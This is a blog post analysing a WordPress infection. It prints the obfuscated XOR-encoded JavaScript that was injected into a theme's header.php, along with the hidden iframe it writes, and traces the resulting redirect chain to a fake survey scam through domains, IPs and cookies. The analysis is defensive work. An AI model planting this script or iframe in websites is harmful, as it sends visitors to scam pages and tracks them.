A new WordPress infection: var a="'1Aqapkrv'02v...

Some days ago I met a malware which attacked a Wordpress based website of a friend of mine.

The symptom of the infection is clear: the first time you visit the home you get redirected to a fake online survey which promises you an Iphone. You can reach this page only once a day, if you use the same ip address.

Here a screenshot of the fake survey. Unidata is my ISP.

After an analys of the home page I found an hidden iframe that I didn't remeber to ever seen:

iframe height="0" src="c11n4.i.teaserguide.com/snitch?default_keyword=Home%20-%20Sito%&referrer=&se_referrer=&source=www.thesite.com" width="0" iframe

The domain teaserguide.com, registered by some Russian people acquires the name of the site and its address, probabily to track the infection. But who is writing this iframe?
At a first look through the code, I found the malevolent script inside the header.php of my theme (Avada child).

The script is encrypted and it looks like this:

var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);

Using a Javascript SandBox I was able to run the script and to verify that it is composing exactly the iframe of the home page.
Ok, perfect, infection found and removed, but... I want to discover some more and I went deeply using Wireshark.

What I found let me surprised. The redirection, in fact, passes through different sites and services, here listed:

Step 1:

 46.229.167.130    HTTP    606    GET /xzAx3?sid1=Test_Source1&sid2=c11n4.i.teaserguide.com&sid3=www.thesite.com

If we query that ip without compiling exactly the parameters of the GET, we see a return page composed by a single sentence: no found offer.
This suggest me that this service return different pages for different sites/requests.
 
Step 2:

HTTP    389    HTTP/1.1 302 Found  (text/html)[Malformed Packet]

bdvice.net/hs/?r=http://djsrp.com/c/41962/54197/?sid=&trx=60q5yyaxk2

Step 3:

46.229.167.130    HTTP    642    GET /hs/?r=http%3A%2F%2Fdjsrp.com%2Fc%2F41962%2F54197%2F%3Fsid%3D%26trx%3Dzc0ccua00t HTTP/1.1 

Step 4:

54.210.222.29    HTTP    452    GET /c/41962/54197/?sid=&trx=zc0ccua00t HTTP/1.1 

Step 5:

id06t.cleardefendlinked.com/?&s1=54197&s2=501595675-222617964-2065267263

This step is interesting because  the domain id06t.cleardefendlinked.com is hosted on the Amazon Cloud platform, as hidden service on: wsf11-1661233086.us-east-1.elb.amazonaws.com
Here we can find a service that offers you a redirect tool or, it is our case, a "Rotator Tool", which is able to rotate and split your link in different urls.
Our destination link will be:
Step 6:

  bMnzz.exclusiverewards.daqa.info/?sov=63633901&hid=hnljjpplnlpxp&redid=6958&gsid=68&id=XNSX.54197%3A%3A501595675%7C%7C222617964%7C%7C2065267263-r6958-t68

 This is the link with the fake online survey. The address is different from the image posted on the top of my post, because this has been reached in another moment, from a different pc.

Analyzing the traffic coming from this final site, we discover the repository for the code used to compose the fake online survey:

192.155.85.199    HTTP    312    GET /templates/_common/_templates/isp_survey_noselect_IT/css/style.css
/templates/_common/js/date/returnDate.it.js
/templates/_common/_templates/isp_survey_noselect_IT/js/script.js
/templates/_common/_templates/isp_survey_noselect_IT/images/logo_red.png

 The suffix IT suggested me that a customized version of the survey exists and in fact you can query styles and scripts also for different languages by changing the suffix.

Other sites connected to the redirection service are:

jvvzz.allnrgames.pocketmarble.science/?sov=63633901&hid=hxlpjrjhjhjrlpxp&redid=6958&gsid=68&id=XNSX.-r6958-t68
it.reimageplus.com/lp/slm/index.php?tracking=YTZ&banner=&adgroup=&ads_name=direct&keyword=direct&context=Co10k75n3p

You can enjoy trying different query to the amazon services.
Of course this analysis is a partial one, because I'm not a strong security researcher and the security world is only an hobby for me, like the web programming. (Sorry but I prefer embedded and desktop programming) :)

Anyway I want to end this story by reporting also the cookie that this site set and it is:

Cookie: log_63633901=1; noshid=hvpzlxjlhnlpxp; id=XNSX.54197%3A%3A501595675%7C%7C222617964%7C%7C2065267263-r6958-t68; SITE_ID=63633901; sov=63633901; mov=nr.ytsurvey.mini; redid=6958; gsid=68; URI=sov%3D63633901%26hid%3Dhnljjpplnlpxp%26redid%3D6958%26gsid%3D68%26id%3DXNSX.54197%253A%253A501595675%257C%257C222617964%257C%257C2065267263-r6958-t68; templateid=26191; path=isp_survey_noselect_IT; version=366255;

In case I'll find any news, I'll update the post, hoping that this will be useful to ban those sites and to remove these infections.